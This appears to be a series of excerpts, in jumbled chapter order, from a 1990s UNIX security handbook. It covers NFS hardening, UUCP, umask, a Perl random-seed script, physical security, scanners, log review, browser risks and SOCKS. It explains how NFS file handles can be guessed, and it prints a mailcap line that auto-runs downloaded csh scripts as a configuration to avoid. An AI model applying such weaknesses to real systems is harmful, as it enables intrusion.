NFS and direct logins are two fundamentally different ways to use a computer. If you allow users to log into a server, they can use that access to probe for weaknesses that can be exploited from NFS, and vice versa.

20.4.8 Use fsirand

One of the security problems with NFS is that the file handles used to reference a file consist solely of a filesystem ID, an inode number, and a generation count. Guessing valid file handles is easy in most circumstances. Filesystem IDs are normally small numbers; the root directory on the standard UNIX filesystem has the inode number 2, /lost+found has the inode number 3, and so on. The only difficulty in guessing a file handle is the generation count. For many important inodes, including the root inode, we would expect the generation count to be very small - we don't normally delete a filesystem's root entry!

The fsirand program increases the difficulty of guessing a valid file handle by randomizing the generation number of every inode on a filesystem. The effect is transparent to the user - files and directories are still fetched as appropriate when a reference is made - but someone on the outside is unable to guess file handles for files and directories anymore.

You can run fsirand on the root directory while in single-user mode or on any unmounted filesystem that will fsck without error. For example, to run fsirand on your /dev/sd1a partition, type the following:

    # umount /dev/sd1a     Unmount the filesystem
    # fsirand /dev/sd1a    Run fsirand

You might benefit from running fsirand once a month on your exported partitions. Some people run it automatically every time the system boots, but this has the disadvantage of making all legitimate file handles stale, too. Consider your environment before taking such a drastic step.

The fsirand program is not available on all versions of UNIX. In particular, it is not available under Linux.

NOTE: Older versions of Sun's fsirand contained buggy code that made the "random" values quite predictable. Be sure you have the latest version of fsirand from your vendor. Most newer versions of the newfs command automatically run fsirand, but not all do. The functionality of fsirand is incorporated into the Solaris 2.5 mkfs command.

20.4.9 Set the portmon Variable

Normally, NFS servers respond to requests that are transmitted from any UDP port. However, because NFS requests are supposed to come from the kernels of other computers, and not from users who are running user-level programs on other computers, a simple way to improve the security of NFS servers is to program them to reject NFS requests that do not come from privileged ports. On many NFS servers, the way that this restriction is established is by setting the kernel variable nfs_portmon to 1. It's important to do this if you want even a minimal amount of NFS security.[10]

[10] The value of 1 is not the default because some vendors' NFS implementations don't send requests from ports below 1024.
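Exactly how you set this variable depends on your system; the following is only a sketch of one common approach, and the module and variable names should be checked against your own vendor's documentation. On Solaris 2.x systems, the variable can reportedly be set by adding a line to /etc/system and rebooting:

    set nfssrv:nfs_portmon = 1

On older BSD-derived systems, the kernel variable is typically patched in place with a debugger such as adb; again, consult your vendor's instructions.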


[12] We have seen several "NFS shells" that allow a user to make such accesses in a largely automated way.

Secure NFS overcomes these problems by using AUTH_DES RPC authentication instead of AUTH_UNIX. With Secure NFS, users must be able to decrypt a special key stored on the NIS or NIS+ server before the NFS filesystem will allow the user to access his or her files.

To specify Secure NFS, you must specify the secure option both on the NFS server (in the exports file or the dfstab) and on the client (in the /etc/fstab or /etc/vfstab file).

NOTE: Secure NFS requires Secure RPC to function, and therefore may not be available on all versions of UNIX. If you are in doubt about your system, check your documentation to see if your NFS mount command supports the secure option. Also note that Secure RPC may not be available on non-UNIX implementations of NFS, either.

Here is an example of using Secure NFS. Suppose that a server has a filesystem /Users that it will export using Secure NFS. The server's /etc/dfs/dfstab file might contain the following line:

    share -F nfs -o secure,rw=clients /Users

Meanwhile, the client's /etc/vfstab file would have a matching line:

    #device          device       mount    FS      fsck    mount    mount
    #to mount        to fsck      point    type    pass    at boot  options
    #
    server:/Users    -            /Users   nfs     -       yes      secure

Chapter 15: UUCP

15.8 UUCP Over Networks

Some versions of UNIX, starting in the late 1980s, allowed transfer of files over IP networks in addition to serial lines. This capability was intended as a convenience for sites that were migrating from primarily phone-based networking to IP-based networking, so that those sites could continue to use their existing UUCP configurations. This upgrade was also intended as a stopgap for Usenet news delivery prior to the development of reliable NNTP-based systems.

The way IP-based UUCP works is via a daemon program, usually named uucpd. A receiving host machine will either have a uucpd daemon always running, or it will run when an incoming connection is requested (see Chapter 17). The sending machine's uucico program will connect with the remote machine's uucpd program to transfer files. Instead of running login followed by uucico in Slave mode, the remote site uses uucpd.

The key point to keep in mind for security is that the uucpd daemon should be disabled on your machine if you are not going to use it. Because you have no telephone lines, you might believe that you don't need to worry about the UUCP installation. This is incorrect! If the daemon is enabled, the default UUCP configuration files might be enough to allow an outsider to snatch copies of files, install altered commands, or fill up your disk.

If you are not using UUCP over networks, be sure that this capability is disabled. And if you are not going to be using UUCP at all, we suggest that you delete UUCP and its associated files from your system, to prevent any accident that might enable it or allow it to be used against your system.
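On most systems that support UUCP over TCP/IP, uucpd is started on demand by inetd, so disabling it is largely a matter of commenting out its line in /etc/inetd.conf and telling inetd to reread its configuration. A sketch only - the service name, the daemon's path, and the location of inetd's PID file all vary from vendor to vendor. Make the entry look something like:

    #uucp   stream  tcp     nowait  root    /usr/sbin/in.uucpd      in.uucpd

and then signal inetd to reread its configuration:

    # kill -HUP `cat /etc/inetd.pid`        Or find inetd's PID with ps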

NOTE: If you have UUCP enabled on a machine with an FTP server, be sure to add all your UUCP accounts to the /etc/ftpusers file. Otherwise, anyone who obtains a UUCP account password will be able to use your ftp service to transfer any files accessible to UUCP into or out of your filesystem (including UUCP control files and binaries - which could compromise your system).
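For instance, if your system uses the conventional uucp and nuucp login names (substitute whatever UUCP accounts actually exist on your machine), /etc/ftpusers should contain entries such as:

    uucp
    nuucp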

Chapter 23: Writing Secure SUID and Network Programs

23.6 Tips on Generating Random Numbers

Random numbers play an important role in modern computer security. Many programs that use encryption need a good source of random numbers for producing session keys. For example, the PGP program uses random numbers for generating a random key which is used to encrypt the contents of electronic mail messages; the random key is then itself encrypted using the recipient's public key.

Random numbers have other uses in computer security as well. A variety of authentication protocols require that the computer create a random number, encrypt it, and send it to the user. The user must then decrypt the number, perform a mathematical operation on it, re-encrypt the number, and send it back to the computer.

A great deal is known about random numbers. Here are some general rules of thumb:

1. If a number is random, then each bit of that number should have an equal probability of being a 0 or a 1.

2. If a number is random, then after each 0 in that number there should be an equal probability that the following bit is a 0 or a 1. Likewise, after each 1 there should be an equal probability that the following bit is a 0 or a 1.

3. If the number has a large number of bits, then roughly half of the number's bits should be 0s, and half of the bits should be 1s.

For security-related purposes, a further requirement for random numbers is unpredictability:

1. It should not be possible to predict the output of the random number generator given previous outputs or other knowledge about the computer generating the random numbers.

2. It should not be possible to determine the internal state of the random number generator.

3. It should not be possible to replicate the initial state of the random number generator, or to reseed the generator with the same initial value.

One of the best ways of generating a stream of random numbers is to make use of a random process, such as radioactive decay. Unfortunately, most UNIX computers are not equipped with Geiger counters. Thus, they need to use something else. Often, they use pseudorandom functions as random number generators.

A pseudorandom function is a function that yields a series of outputs which appears to be unpredictable. In practice, these functions maintain a large internal state from which the output is calculated. Each time a new number is generated, the internal state is changed. The function's initial state is referred to as its seed.

If you need a series of random numbers that is repeatable, you need a pseudorandom generator that takes a seed and keeps an internal state. If you need a non-reproducible series of random numbers, you should avoid pseudorandom generators. Thus, successfully picking random numbers in the UNIX environment depends on two things: picking the right random number generator, and then picking a different seed each time the program is run.

Chapter 5: The UNIX Filesystem

5.3 The umask

The umask (UNIX shorthand for "user file-creation mode mask") is a four-digit octal number that UNIX uses to determine the file permission for newly created files. Every process has its own umask, inherited from its parent process.

The umask specifies the permissions you do not want given by default to newly created files and directories. The kernel determines the actual mode of a new file by ANDing the requested mode with the bitwise complement of the umask. Bits that are set in the umask correspond to permissions that are not automatically assigned to newly created files.

By default, most UNIX versions specify an octal mode of 666 (any user can read or write the file) when they create new files.[20] Likewise, new programs are created with a mode of 777 (any user can read, write, or execute the program). Inside the kernel, the mode specified in the open call is masked with the value specified by the umask - thus its name.

[20] We don't believe there is any religious significance to this, although we do believe that making files readable and writable by everyone leads to many evil deeds.

Normally, you or your system administrator set the umask in your .login, .cshrc, or .profile files, or in the system /etc/profile file. For example, you may have lines that look like this in one of your startup files:

    # Set the user's umask
    umask 033

When the umask is set in this manner, it should be set as one of the first commands. Files created by anything executed before the umask command will be created under the previous, possibly unsafe, value.

Under SVR4 you can specify a default umask value in the /etc/default/login file. This umask is then given to every user that executes the login program. This method is a much better (and more reliable) means of setting the value for every user than setting the umask in the shell's startup files.

5.3.1 The umask Command

An interface to the umask function is built into the sh, ksh, and csh shell programs. (If umask were a separate program, then typing umask wouldn't change the umask value for the shell's process! See Appendix C if you are unsure why this is so.) There is also a umask() system call for programs that wish to further change their umask.

The most common umask values are 022, 027, and 077. A umask value of 022 lets the owner both read and write all newly created files, but everybody else can only read them:

    0666     default file-creation mode
    (0022)   umask
    0644     resultant mode

A umask value of 077 lets only the file's owner read and write newly created files:

    0666     default file-creation mode
    (0077)   umask
    0600     resultant mode

A simple way to calculate umask values is to remember that the number 2 in the umask turns off write permission, while 7 turns off read, write, and execute permission.

A umask value of 002 is commonly used by people who are working on group projects. If you create a file with your umask set to 002, anyone in the file's group will be able to read or modify the file. Everybody else will only be allowed to read it:

    0666     default file-creation mode
    (0002)   umask
    0664     resultant mode

If you use the Korn shell, ksh, then you can set your umask symbolically. You do this with the same general syntax as the chmod command. In ksh, the following two commands are equivalent:

    % umask u=rwx,g=x,o=
    % umask 067
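If you want to confirm what a particular umask produces on your system, a quick test takes only a moment (the file name is arbitrary, and the owner, group, and date in the listing will of course differ on your system):

    % umask 027
    % touch /tmp/umask-test
    % ls -l /tmp/umask-test
    -rw-r-----  1 you      staff           0 Apr 12 10:45 /tmp/umask-test
    % rm /tmp/umask-test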

5.3.2 Common umask Values

On many UNIX systems, the default umask is 022. This is inherited from the init process, as all processes are descendants of init.[21] Some systems may be configured to use another umask value, or a different value may be set in the startup files.

[21] See the discussion in Appendix C to learn about init's role.

The designers of these systems chose this umask value to foster sharing, an open computing environment, and cooperation among users. Most prototype user accounts shipped with UNIX operating systems specify 022 as the default umask, and many computer centers use this umask when they set up new accounts. Unfortunately, system administrators frequently do not make a point of explaining the umask to novice users, and many users are not aware that most of the files they create are readable by every other user on the system.

A recent trend among computing centers has been to set up new accounts with a umask of 077, so a user's files will, by default, be unreadable by anyone else on the system unless the user makes a conscious choice to make them readable.

Here are some common umask values and their effects:

Table 5.10: Common umask Settings

    umask   User Access     Group Access    Other Access
    0000    all             all             all
    0002    all             all             read, execute
    0007    all             all             none
    0022    all             read, execute   read, execute
    0027    all             read, execute   none
    0077    all             none            none

Chapter 23: Writing Secure SUID and Network Programs

23.9 A Good Random Seed Generator

As we've mentioned, one way of generating a random seed is to use a message digest algorithm such as MD5 or HAVAL. As input, give it as much data as you can based on temporary state. This data might include the output of ps -efl, the environment variables for the current process, its PID and PPID, the current time and date, the output of the random number generator given your seed, the seed itself, the state of network connections, and perhaps a directory listing of the current directory. The output of the function will be a string of bits that an attacker cannot likely duplicate, but which is likely to meet all the other conditions of randomness you might desire.

The Perl program in Example 23.1 is an example of such a program. It uses several aspects of system state, network status, virtual memory statistics, and process state as input to MD5. These numbers change very quickly on most computers and cannot be anticipated, even by programs running as superuser on the same computer. The entropy (randomness) of these values is spread throughout the result by the hashing function of MD5, resulting in an output that should be sufficiently random for most uses.

Note that this script is an excellent method for generating Xauthority keys (see "X security" in Chapter 17), if you need them. Simply execute it with an argument of 14 (you need 28 hex characters of key) and use the result as your key.

Example 23.1: Generating a Random Seed String

    #!/usr/bin/perl
    #
    # randbits -- Gene Spafford
    # generate a random seed string based on state of system
    #
    # Inspired by a program from Bennett Todd (bet@std.sbi.com), derived
    # from original by Larry Wall.
    #
    # Uses state of various kernel structures as random "seed"
    # Mashes them together and uses MD5 to spread around
    #
    # Usage: randbits [-n] [-h | -H ] [keylen]
    # Where
    #   -n means to emit no trailing linefeed
    #   -h means to give output in hex (default)
    #   -H means hex output, but use uppercase letters
    #   keylen is the number of bytes to the random key (default is 8)
    #
    # If you run this on a different kind of system, you will want to adjust the
    # setting in the "noise" string to system-specific strings. Do it as another
    # case in the "if...else" and e-mail me the modification so I can keep a
    # merged copy. (Hint: check in your manual for any programs with "stat" in
    # the name or description.)
    #
    # You will need to install a version of MD5. You can find one in the COAST
    # archive at ftp://coast.cs.purdue.edu/pub/tools/unix
    # Be sure to include its location in the PATH below if it isn't in one of the
    # directories already listed.

    $ENV{'PATH'} = "/bin:/usr/bin:/usr/etc:/usr/ucb:/etc:" . $ENV{'PATH'};

    # We start with the observation that most machines have either a BSD
    # core command set, or a System V-ish command set. We'll build from those.
    $BSD  = "ps -agxlww ; netstat -s ; vmstat -s ;";
    $SYSV = "ps -eflj ; netstat -s ; nfsstat -nr ;";

    if ( -e "/sdmach" ) {
        $_ = "NeXT";
    } elsif ( -x "/usr/bin/uname" || -x "/bin/uname") {
        $_ = `uname -sr`;
    } elsif ( -x "/etc/version" ) {
        $_ = `/etc/version`;
    } else {
        die "How do I tell what OS this is?";
    }

    /^AIX 1/          && ( $noise = $BSD . 'pstat -afipSsT')            ||
    /^CLIX 3/         && ( $noise = "ps -efl ; nfsstat -nr")            ||
    /^DYNIX/          && ( $noise = $BSD . 'pstat -ai')                 ||
    /^FreeBSD 2/      && ( $noise = $BSD . 'vmstat -i')                 ||
    /^HP-UX 7/        && ( $noise = $SYSV)                              ||
    /^HP-UX A.09/     && ( $noise = $SYSV . "vmstat -s")                ||
    /^IRIX(64)? [56]/ && ( $noise = $SYSV)                              ||
    /^Linux 1/        && ( $noise = "ps -agxlww ; netstat -i ; vmstat") ||
    /^NeXT/           && ( $noise = 'ps agxlww;netstat -s;vm_stat')     ||
    /^OSF1/           && ( $noise = $SYSV . 'vmstat -i')                ||
    /^SunOS 4/        && ( $noise = $BSD . 'pstat -afipSsT;vmstat -i')  ||
    /^SunOS 5/        && ( $noise = $SYSV . 'vmstat -i;vmstat -s')      ||
    /^ULTRIX 4/       && ( $noise = $BSD . 'vmstat -s')                 ||
        die "No 'noise' commands defined for this OS. Edit and retry!";

    #### End of things you may need to modify

    require 'getopts.pl';
    require 'open2.pl';

    ($prog = $0) =~ s|.*/||;
    $usage = "usage: $prog [-n] [-h | -H] [keylength]\n";

    &Getopts('nhH') || die $usage;
    defined($keylen = shift) || ($keylen = 8);
    die $usage if ($keylen =~ /\D/);
    die $usage if ($opt_H && $opt_h);
    die "Maximum keylength is 16 bytes (32 hex digits)\n" if ($keylen > 16);

    # Run the noise command and include whatever other state we
    # can conveniently (portably) find.
    @junk = times();
    $buf = `$noise` . $$ . getppid() . time . join('', %ENV) . "@junk" . `ls -lai`;

    # Now, run it through the md5 program to mix bits and entropy
    &open2('m_out', 'm_in', "md5") || die "Cannot run md5 command: $!";
    print m_in $buf;
    close m_in;
    $buf = <m_out>;

    ($buf =~ y/a-f/A-F/) if $opt_H;
    print substr($buf, 0, 2*$keylen);
    print "\n" unless $opt_n;
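For instance, to use randbits to generate and install an X magic cookie as suggested above (a sketch only; the generated value differs on every run, and your display name may not be $DISPLAY if you are setting up a cookie for another host):

    % xauth add $DISPLAY . `randbits 14`

The "." in the xauth command is shorthand for the MIT-MAGIC-COOKIE-1 protocol.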

Chapter 12: Physical Security

Contents:
One Forgotten Threat
Protecting Computer Hardware
Protecting Data
Story: A Failed Site Inspection

"Physical security" is almost everything that happens before you (or an attacker) start typing commands on the keyboard. It's the alarm system that calls the police department when a late-night thief tries to break into your building. It's the key lock on the computer's power supply that makes it harder for unauthorized people to turn the machine off. And it's the surge protector that keeps a computer from being damaged by power surges.

This chapter discusses basic physical security approaches. It's designed for people who think that this form of security is of no concern. Unfortunately, physical security is an oft-overlooked aspect of security that is very important. You may have the best encryption and security tools in place, and your UNIX systems may be safely hidden behind a firewall. However, if you cheerfully hire an industrial spy as your system administrator, and she walks off with your disk drives, those other fancy defenses aren't much help.

12.1 One Forgotten Threat

Surprisingly, many organizations do not consider physical security to be of the utmost concern. One New York investment house was spending tens of thousands of dollars on computer security measures to prevent break-ins during the day, only to discover that its cleaning staff was propping open the doors to the computer room at night while the floor was being mopped. In the late 1980s, a magazine in San Francisco had more than $100,000 worth of computers stolen over a holiday: an employee had used his electronic key card to unlock the building and disarm the alarm system; after getting inside, the person went to the supply closet where the alarm system was located and removed the paper from the alarm system's log printer.

Physical security is one of the most frequently forgotten forms of security because the issues that it encompasses - the threats, practices, and protections available - are different for practically every site. Physical security resists simple treatment in books on computer security, as different organizations running identical system software might have dramatically different physical-security needs. (Many popular books on UNIX system security do not even mention physical security.) Because physical security must inherently be installed on-site, it cannot be pre-installed by the operating system vendor, sold by telemarketers, or FTP'ed over the Internet as part of a free set of security tools.

Anything that we can write about physical security must therefore be broadly stated and general. Because every site is different, this chapter can't give you a set of specific recommendations. It can only give you a starting point, a list of issues to consider, and a procedure for formulating your plan.

12.1.1 The Physical Security Plan

The first step to physically securing your installation is to formulate a written plan addressing your current physical security needs and your intended future direction - something we discussed in Chapter 2, Policies and Guidelines. Ideally, such a plan should be part of the site security policy, and should include:

● Description of the physical assets that you are protecting

● Description of the physical area where the assets are located

● Description of your security perimeter (the boundary between the rest of the world and your secured area), and the holes in the perimeter

● Threats you are protecting against

● Your security defenses, and ways of improving them

● Estimated cost of any improvements, the cost of the information that you are protecting, and the likelihood of an attack, accident, or disaster

If you are managing a particularly critical installation, you should take great care in formulating this plan. Have it reviewed by an outside firm that specializes in disaster recovery planning and risk assessment. You should also consider your security plan a sensitive document: by its very nature, it contains detailed information on your defenses' weakest points.

Smaller businesses, many educational institutions, and home systems will usually not need anything so formal; some preparation and common sense are all that is usually necessary, although even a day of a consultant's time may be money well spent.

Some organizations may consider many of the ideas described in the following sections to be overkill. Before you come to this conclusion, ask yourself five questions:

1. Does anybody other than you have physical access to your computer?

2. What would happen if that person had a breakdown or an angry outburst, and tried to smash your system with a hammer?

3. What would happen if someone in the employ of your biggest competitor were to come into the building unnoticed?

4. In the event of some large disaster in the building, would you lose the use of your computer?

5. If some disaster were to befall your system, how would you face all your angry users?

Chapter 17: TCP/IP Services

17.6 Network Scanning

In recent years, a growing number of programs have been distributed that you can use to scan your network for known problems. Unfortunately, attackers can also use these tools to scan your network for vulnerabilities. Thus, you would be wise to get one or more of these tools and try them yourself, before your opponents do. See Appendix E, Electronic Resources, for information about obtaining these tools.

17.6.1 SATAN

SATAN is a package of programs written by Dan Farmer and Wietse Venema, two well-known security experts. The package probes hosts on a network for a variety of well-known security flaws. The results of the scan and the interface to the programs are presented in HTML and may be viewed using a WWW browser.

SATAN is large, and has a "footprint" that is relatively easy to detect. Several programs have been written that can warn if a host has been scanned with SATAN.

17.6.2 ISS

The Internet Security Scanner (ISS) is a smaller, more aggressive scanner than SATAN. It comes in two versions: a complex version that is sold commercially, and a freeware, stripped-down version. The commercial version is expensive, and we have no personal experience with it. However, we know people who have licensed the commercial version and use it frequently on their internal systems to check for problems.

Authorities with various FIRST teams report that the majority of network break-ins and intrusions they handle begin with use of the ISS freeware scanner.

17.6.3 PingWare

PingWare is a scanning program marketed by Bellcore. It is allegedly based on a series of shell scripts and programs, and provides scanning that is not as comprehensive as ISS. We have no personal experience with this product, and we have had no report from anyone who has actually used it, so we cannot comment on it further.

Chapter 24: Discovering a Break-in

24.3 The Log Files: Discovering an Intruder's Tracks

Even if you don't catch an intruder in the act, you still have a good chance of finding the intruder's tracks by routinely looking through the system logs. (For a detailed description of the UNIX log files, see Chapter 10, Auditing and Logging.) Remember: look for things out of the ordinary; for example:

● Users logging in at strange hours

● Unexplained reboots

● Unexplained changes to the system clock

● Unusual error messages from the mailer, ftp daemon, or other network server

● Failed login attempts with bad passwords

● Unauthorized or suspicious use of the su command

● Users logging in from unfamiliar sites on the network
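A few quick checks along these lines are easy to run by hand or from a nightly script. The log file names and locations vary widely from system to system (see Chapter 10 for where your system keeps its logs), so the paths below are only examples:

    % last | head -20                    Recent logins, logouts, and reboots
    % grep su /var/adm/messages          Recent su activity, if logged via syslog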

On the other hand, if the intruder is sufficiently skillful and achieves superuser access on your machine, he or she may erase all evidence of the invasion. Simply because your system has no record of an intrusion in the log files, you can't assume that your system hasn't been attacked.

Many intruders operate with little finesse: instead of carefully editing out a record of their attacks, they simply delete or corrupt the entire log file. This means that if you discover a log file deleted or containing corrupted information, there is a possibility that the computer has been successfully broken into. However, a break-in is not the only possible conclusion. Missing or corrupted logs might mean that one of your system administrators was careless; there might even be an automatic program on your system that erases the log files at periodic intervals.

You may also discover that your system has been attacked if you notice unauthorized changes in system programs or in an individual user's files. This is another good reason for using something like the Tripwire tool to monitor your files for changes (see Chapter 9).

If your system logs to a hardcopy terminal or another computer, you may wish to examine that log first, because you know that it can't have been surreptitiously modified by an attacker coming in by telephone or network.

Chapter 18: WWW Security

18.5 Risks of Web Browsers

In addition to the threat of monitoring discussed earlier in this chapter, Web browsers themselves raise a number of security issues.

18.5.1 Executing Code from the Net

Most Web browsers can be configured so that certain "helper" applications are automatically run when files of a particular type are downloaded from the net. Although this is a good way to provide extensibility, you should not configure your Web browser so that programs downloaded from the net are automatically executed. Doing so poses a profound risk, because it provides a way for outsiders to run programs on your computer without your explicit permission. (For example, a program could be embedded in an HTML page as an included "image.")

In particular:

● Do not configure /bin/csh as a viewer for documents of type application/x-csh. (The same is true with other shells; a sketch of the kind of configuration entry to avoid appears after this list.)

● Do not configure your Web browser to automatically run spreadsheets or word processors, because most spreadsheets and word processors these days have the ability to embed executable code within their files. We have already seen several reported viruses that use Microsoft Word macros to spread.
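On UNIX browsers that use the mailcap mechanism to find helper applications (an assumption about your particular browser - check its documentation), the dangerous configuration is only one line long. An entry such as the following in ~/.mailcap or the system-wide mailcap file is exactly what you should not have:

    application/x-csh; /bin/csh %s

There is no safe variant of such an entry; simply leave the type unconfigured, so that downloaded scripts are saved to disk (or you are prompted) rather than executed.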

The exception to these hard-and-fast rules may be the Java programming language. The creators of Java have gone to great lengths to make sure that a program written in Java cannot harm the computer on which it is running. Whether or not the creators are correct remains to be seen. However, we have our doubts, based on past experience with complex software. As this book goes to press, there is no indication that Java has any significant protections against denial of service attacks. Also, as this book goes to press, several serious security bugs in Sun's and Netscape's implementations of Java have been reported.

18.5.2 Trusting Your Software Vendor

Most users run Web browsers that are provided by third parties with whom the user has no formal relationship or signed contract. Instead, users are asked to click buttons that say "ACCEPT" to signify their acceptance of the terms of a non-negotiable license agreement. These license agreements limit the liability of the companies that distribute the software.

Individuals and organizations using such software should carefully read the license agreements. They rarely do. In particular, consider these two clauses in the Netscape Navigator 2.02b license. Interestingly, these are the only two paragraphs of the Netscape license agreement that are in all capital letters. They must be important.

2. NETSCAPE MAKES NO REPRESENTATIONS ABOUT THE SUITABILITY OF THIS SOFTWARE OR ABOUT ANY CONTENT OR INFORMATION MADE ACCESSIBLE BY THE SOFTWARE, FOR ANY PURPOSE. THE SOFTWARE IS PROVIDED "AS IS" WITHOUT EXPRESS OR IMPLIED WARRANTIES, INCLUDING WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE OR NONINFRINGEMENT. THIS SOFTWARE IS PROVIDED GRATUITOUSLY AND, ACCORDINGLY, NETSCAPE SHALL NOT BE LIABLE UNDER ANY THEORY FOR ANY DAMAGES SUFFERED BY YOU OR ANY USER OF THE SOFTWARE. NETSCAPE WILL NOT SUPPORT THIS SOFTWARE AND WILL NOT ISSUE UPDATES TO THIS SOFTWARE.

9. NETSCAPE OR ITS SUPPLIERS SHALL NOT BE LIABLE FOR (a) INCIDENTAL, CONSEQUENTIAL, SPECIAL OR INDIRECT DAMAGES OF ANY SORT, WHETHER ARISING IN TORT, CONTRACT OR OTHERWISE, EVEN IF NETSCAPE HAS BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR (b) FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU.

What these paragraphs mean is that Netscape Communications disclaims any liability for anything that its Navigator software might do.[5] This means that the Navigator could scan your computer's disks for interesting information and send it, encrypted, to a Netscape Commerce Server, when it is sent an appropriate command. We don't think that Navigator actually has this code compiled into it, but we don't know, because Netscape has not published the source code for either its Navigator or its Commerce Server. (Netscape is not alone in keeping its source code secret.)

[5] We don't mean to pick on Netscape here. Other software comes with similar license agreements. Netscape is used merely as an illustrative example because of its popularity when this book was being written.

We do know, however, that users have reported some security lapses in the 2.0beta Navigator having to do with Netscape's LiveScript, renamed JavaScript, programming language. A feature in a beta version of the browser allowed any server to query the Web browser for the list of URLs that had been visited by the user.[6] As URLs can contain passwords, this posed serious security issues. Although this feature has been taken out of Navigator, it is possible that it could be reintroduced in the future through the use of a programming language such as Java.

[6] This was reported by Scott Weston on the comp.privacy Usenet newsgroup on December 1, 1995.

Indeed, programming languages such as Java create a whole new layer of security issues. Java is a programming language that is designed to allow the downloading of applications over the World Wide Web. Java is designed to be secure: the programs are run on a virtual machine, and they are not run unless they are approved by a "verifier" in the Web browser. In the initial implementation of Java for Web browsers, programs written in Java are permitted to access the network or to touch the user's filesystem, but not both. Programs that can touch the filesystem are permitted to read any file, but only to write in a specially predetermined directory.

Unfortunately, Java's current security model is rather restrictive, and it is therefore quite likely that users will demand a more open model that gives Java programs more access to a user's filesystem and the network. This will probably produce a new round of security problems.

Chapter 22: Wrappers and Proxies

22.4 SOCKS

SOCKS is a system that allows computers behind a firewall to access services on the Internet. The program allows you to centrally control how programs on your organization's network communicate with the Internet. With SOCKS, you can allow specific services to specific computers, disable access to individual hosts on the Internet, and log as much or as little as you want.

SOCKS was originally written by David Koblas and Michelle Koblas. It has since been extended by Ying-Da Lee at NEC's Systems Laboratory, and a commercially supported version is available from NEC. The name SOCKS stands for "SOCK-et-S." According to the SOCKS FAQ, "it was one of those `development names' that never left."

SOCKS consists of two parts:

SOCKS server
   A program that is run on a host that can communicate directly with both the Internet and the internal computers on your network (e.g., the firewall's gate).

SOCKS client programs
   Specially modified Internet client programs that know to contact the SOCKS server instead of sending requests directly to the Internet.

The standard SOCKS distribution comes with client programs for finger, ftp, telnet, and whois. SOCKS also includes a library you can use to create other SOCKS clients at will. Furthermore, many programs, such as NCSA Mosaic, include provisions for using SOCKS to negotiate firewalls.

SOCKS is available for most versions of UNIX, including SunOS, Sun Solaris, IRIX, Ultrix, HP-UX, AIX, Interactive Systems UNIX, OSF/1, NetBSD, UnixWare, and Linux. A version called PC SOCKS, by Cornell Kinderknecht, is available for Microsoft Windows. A Macintosh version is under development.

22.4.1 What SOCKS Does

The SOCKS client software works by replacing calls to the UNIX socket functions - connect(), getsockname(), bind(), accept(), listen(), and select() - with its own versions of these functions. In practice, this replacement is done by adding a few macro definitions to the CFLAGS in the Makefile that is used to compile the network client program, and then linking the resulting program with the SOCKS library.
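In practice, SOCKSifying a client usually amounts to a Makefile change along the following lines. This is only a sketch: the macro names and library path shown here are assumptions (chosen to match the R-prefixed routines, such as Rbind() and Rgethostbyname(), mentioned elsewhere in this chapter), so take the exact settings from the instructions in your SOCKS distribution.

SOCKS_LIB = /usr/local/lib/libsocks.a       # illustrative location of the SOCKS library
CFLAGS = -O -Dconnect=Rconnect -Dgetsockname=Rgetsockname -Dbind=Rbind \
         -Daccept=Raccept -Dlisten=Rlisten -Dselect=Rselect
# ...then add $(SOCKS_LIB) to the final link line of the client program.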

When a SOCKS-modified client attempts to connect to a server on the Internet, the SOCKS library intercepts the connection attempt and instead opens up a connection to the SOCKS server. After the connection is established, the SOCKS client sends through the following information:

● Version number
● Connect request command
● Port number to which the client requested to connect
● IP address to which the client requested to connect
● Username of the person initiating the request

The SOCKS server then checks its access control list to see if the connection should be accepted or rejected. If the connection is accepted, the server opens up a connection to the remote machine and then relays all information back and forth. If the connection is rejected, the server disconnects from the client. This configuration is shown graphically in Figure 22.1.

Figure 22.1: Using SOCKS for proxying

SOCKS can also be used to allow computers behind a firewall to receive connections. In this case, a connection is opened to the SOCKS server, which in turn gets ready to accept connections from the Internet.

SOCKS works only with TCP/IP; for UDP services (such as Archie), use UDP Relayer, described later in this chapter.

22.4.2 Getting SOCKS

SOCKS may be freely downloaded from the Internet. The addresses are:

ftp://ftp.nec.com/pub/security/socks.cstc/
http://www.socks.nec.com/

If you operate two nameservers to hide information from the Internet, you will also need to download the file Rgethostbyname.c. This file contains a function that can be used to query multiple nameservers to resolve a hostname.

There is a mailing list devoted to SOCKS and related issues. To join it, send the message "subscribe socks your-email-address" to majordomo@syl.dl.nec.com.

NOTE: This section discusses SOCKS Version 4. At the time of this writing, SOCKS Version 5 was under development. New features in SOCKS 5 include strong authentication, authentication method negotiation, message integrity, message privacy, and support for UDP applications.

22.4.3 Getting SOCKS Running

After you have downloaded the system, you will need to follow these steps to get it running:

1. Unpack the SOCKS distribution.

2. Decide whether you wish to have the SOCKS daemon started automatically when the system starts (boot time), or started by inetd when each SOCKS request is received.

   The advantage of having the daemon start automatically at system start-up is that the daemon will need to read its configuration file only once. Otherwise, the configuration file will have to be read each time a SOCKS connection is requested. We recommend that you have SOCKS started at boot time.

3. Edit the file Makefile in the main SOCKS directory and the file include/socks.h to reflect the policy of your site. Be sure to edit the variables found in Table 22.4.

   Table 22.4: Variables

   Variable              Location         Purpose/Setting
   SOCKS_DEFAULT_SERVER  include/socks.h  Set to the hostname of the computer that hosts the sockd daemon.
   SOCKS_DEFAULT_NS      include/socks.h  Set if the clients inside your firewall cannot look up the IP addresses of external hosts.
   NOT_THROUGH_INETD     include/socks.h  Set if sockd will be started automatically at system boot.
   SOCKS_CONF            include/socks.h  Location of the SOCKS configuration file for client machines.
   SOCKD_CONF            include/socks.h  Location of the SOCKS configuration file for the sockd daemon.
   MULTIHOMED_SERVER     include/socks.h  Set if sockd will be running on a multihomed server (a gate computer with two Ethernet ports).
   SOCKD_ROUTE_FILE      include/socks.h  Location of the SOCKS routing file, for use with multihomed servers.
   FACIST                Makefile         Causes the SOCKS FTP client to log the names of all files transferred.
   FOR_PS                Makefile         Causes sockd to display information about its current activity in the output from the ps command.
   SERVER_BIN_DIR        Makefile         Directory containing the sockd daemon.
